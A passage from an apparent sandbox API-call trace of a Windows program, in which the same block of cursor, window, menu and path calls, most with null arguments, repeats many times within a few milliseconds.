lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.604] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.604] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.604] GetMenu (hWnd=0x0) returned 0x0 [0027.604] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.604] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.604] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.604] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.604] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.604] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.604] GetStockObject (i=6) returned 0x1b00018 [0027.604] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.604] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.604] PathFileExistsW (pszPath=0x0) returned 0 [0027.604] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.604] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.604] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.604] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.604] GetMenu (hWnd=0x0) returned 0x0 [0027.604] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.604] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.604] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.605] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.605] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.605] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.605] GetStockObject (i=6) returned 0x1b00018 [0027.605] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.605] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.605] PathFileExistsW (pszPath=0x0) returned 0 [0027.605] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.605] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.605] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.605] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.605] GetMenu (hWnd=0x0) returned 0x0 [0027.605] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.605] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.605] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.605] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.605] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.605] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.605] GetStockObject (i=6) returned 0x1b00018 [0027.605] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.605] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.605] PathFileExistsW (pszPath=0x0) returned 0 [0027.605] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.605] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.605] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.605] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.605] GetMenu (hWnd=0x0) returned 0x0 [0027.605] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.605] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.605] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.605] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.605] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.605] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.606] GetStockObject (i=6) returned 0x1b00018 [0027.606] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.606] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.606] PathFileExistsW (pszPath=0x0) returned 0 [0027.606] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.606] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.606] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.606] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.606] GetMenu (hWnd=0x0) returned 0x0 [0027.606] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2c5) returned -1 [0027.606] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.606] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.606] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.606] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.606] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.606] GetStockObject (i=6) returned 0x1b00018 [0027.606] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.606] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.606] PathFileExistsW (pszPath=0x0) returned 0 [0027.606] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.606] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.606] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.606] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.606] GetMenu (hWnd=0x0) returned 0x0 [0027.606] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.607] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.607] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.607] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.607] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.607] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.607] GetStockObject (i=6) returned 0x1b00018 [0027.607] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.607] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.607] PathFileExistsW (pszPath=0x0) returned 0 [0027.607] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.607] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.607] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.607] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.607] GetMenu (hWnd=0x0) returned 0x0 [0027.607] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.607] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.607] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.607] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.607] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.607] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.607] GetStockObject (i=6) returned 0x1b00018 [0027.607] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.607] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.607] PathFileExistsW (pszPath=0x0) returned 0 [0027.607] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.607] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.607] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.607] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.607] GetMenu (hWnd=0x0) returned 0x0 [0027.607] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.607] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.607] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.607] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.607] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.608] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.608] GetStockObject (i=6) returned 0x1b00018 [0027.608] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.608] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.608] PathFileExistsW (pszPath=0x0) returned 0 [0027.608] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.608] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.608] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.608] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.608] GetMenu (hWnd=0x0) returned 0x0 [0027.608] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.608] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.608] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.608] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.608] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.608] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.608] GetStockObject (i=6) returned 0x1b00018 [0027.608] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.608] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.608] PathFileExistsW (pszPath=0x0) returned 0 [0027.608] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.608] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.608] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.608] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.608] GetMenu (hWnd=0x0) returned 0x0 [0027.608] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x56e) returned -1 [0027.608] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.608] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.608] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.608] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.608] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.609] GetStockObject (i=6) returned 0x1b00018 [0027.609] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.609] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.609] PathFileExistsW (pszPath=0x0) returned 0 [0027.609] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.609] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.609] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.609] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.609] GetMenu (hWnd=0x0) returned 0x0 [0027.609] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.609] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.609] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.609] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.609] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.609] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.609] GetStockObject (i=6) returned 0x1b00018 [0027.609] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.609] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.609] PathFileExistsW (pszPath=0x0) returned 0 [0027.609] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.609] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.609] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.609] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.609] GetMenu (hWnd=0x0) returned 0x0 [0027.609] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.609] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.609] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.609] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.609] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.609] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.609] GetStockObject (i=6) returned 0x1b00018 [0027.609] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.609] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.609] PathFileExistsW (pszPath=0x0) returned 0 [0027.610] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.610] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.610] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.610] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.610] GetMenu (hWnd=0x0) returned 0x0 [0027.610] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.610] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.610] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.610] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.610] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.610] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.610] GetStockObject (i=6) returned 0x1b00018 [0027.610] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.610] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.610] PathFileExistsW (pszPath=0x0) returned 0 [0027.610] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.610] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.610] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.610] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.610] GetMenu (hWnd=0x0) returned 0x0 [0027.610] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.610] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.610] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.610] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.610] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.610] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.610] GetStockObject (i=6) returned 0x1b00018 [0027.610] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.610] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.610] PathFileExistsW (pszPath=0x0) returned 0 [0027.610] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.610] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.610] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.611] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.611] GetMenu (hWnd=0x0) returned 0x0 [0027.611] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2bc) returned -1 [0027.611] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.611] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.611] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.611] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.611] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.611] GetStockObject (i=6) returned 0x1b00018 [0027.611] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.611] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.611] PathFileExistsW (pszPath=0x0) returned 0 [0027.611] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.611] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.611] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.611] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.611] GetMenu (hWnd=0x0) returned 0x0 [0027.611] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.611] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.611] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.611] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.611] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.611] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.611] GetStockObject (i=6) returned 0x1b00018 [0027.611] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.611] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.611] PathFileExistsW (pszPath=0x0) returned 0 [0027.611] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.611] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.611] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.611] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.611] GetMenu (hWnd=0x0) returned 0x0 [0027.611] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.612] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.612] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.612] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.612] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.612] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.612] GetStockObject (i=6) returned 0x1b00018 [0027.612] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.612] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.612] PathFileExistsW (pszPath=0x0) returned 0 [0027.612] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.612] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.612] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.612] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.612] GetMenu (hWnd=0x0) returned 0x0 [0027.612] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.612] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.612] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.612] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.612] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.612] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.612] GetStockObject (i=6) returned 0x1b00018 [0027.612] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.612] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.612] PathFileExistsW (pszPath=0x0) returned 0 [0027.612] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.612] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.612] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.612] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.612] GetMenu (hWnd=0x0) returned 0x0 [0027.612] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.612] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.612] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.612] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.612] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.613] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.613] GetStockObject (i=6) returned 0x1b00018 [0027.613] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.613] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.613] PathFileExistsW (pszPath=0x0) returned 0 [0027.613] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.613] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.613] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.613] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.613] GetMenu (hWnd=0x0) returned 0x0 [0027.613] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x35a) returned -1 [0027.613] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.613] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.613] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.613] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.613] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.613] GetStockObject (i=6) returned 0x1b00018 [0027.613] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.613] PathAppendA (in: pszPath=0x0, 